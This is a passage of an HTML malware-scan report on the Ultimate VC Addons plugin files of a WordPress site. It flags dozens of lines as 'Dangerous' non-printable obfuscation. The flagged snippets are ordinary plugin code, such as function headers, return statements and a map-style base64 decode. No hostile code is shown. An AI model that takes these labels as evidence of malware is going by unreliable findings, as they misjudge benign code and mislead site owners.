</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">counter_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 559</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats counter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">counter_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_324").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_interactive_banner_2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 23.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_325" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){ $(</span><span style="color: #0000BB">document</span><span style="color: #007700">).</span><span style="color: #0000BB">ready</span><span style="color: #007700">(function(){ $(</span><span style="color: #DD0000">".ult-new-ib"</span><span style="color: #007700">).</span><span style="color: #0000BB">css</span><span style="color: #007700">(</span><span style="color: #DD0000">"opacity"</span><span style="color: #007700">,</span><span style="color: #DD0000">"1"</span><span style="color: #007700">); }); })(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">); </</span><span style="color: #0000BB">script</span><span style="color: #007700">></span><span style="color: #DD0000">'; return $output; } } } if(class_exists('</span><span style="color: #0000BB">Ultimate_Interactive_Banner</span><span style="color: #DD0000">')) { $Ultimate_Interactive_Banner = new Ultimate_Interactive_Banner; } if ( class_exists( '</span><span style="color: #0000BB">W</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ib2_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 570</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_325").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_google_maps.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.80 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_326" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Google_Maps</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_google_map'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_google_map </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_map_script</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_maps_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 358</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_ultimate_map</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">(</span><span style="color: #0000BB">$map_style</span><span style="color: #007700">))).</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 505</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 513</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">event</span><span style="color: #007700">, </span><span style="color: #0000BB">ui</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggleBounce</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_326").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_content_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_327" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_content_box_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'content-box' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_content_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'content-box'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">) ); } } new </span><span style="color: #0000BB">Ult_Content_Box</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">clas</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function!=</span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">';'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 158</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">' => '</span><span style="color: #0000BB">ease</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_327").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_range_slider.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 29.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_328" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">range_slider_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_range_slider_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'range-slider' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_range_slider_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'range-slider'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'jquery'</span><span style="color: #007700">, </span><span style="color: #DD0000">'jquery-ui-core'</span><span style="color: #007700">, </span><span style="color: #DD0000">'jquery-ui-widget'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_ultimate_font_family" </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$title_font </span><span style="color: #007700">) : </span><span style="color: #DD0000">'' </span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_ultimate_font_family" </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$desc_font </span><span style="color: #007700">) : </span><span style="color: #DD0000">'' </span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_range_slider_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">=</span><span style="color: #0000BB">null </span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 277</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_range_slider</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"vc_map" </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 796</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">range_slider_scripts</span><span style="color: #007700">() {</span>
</span>
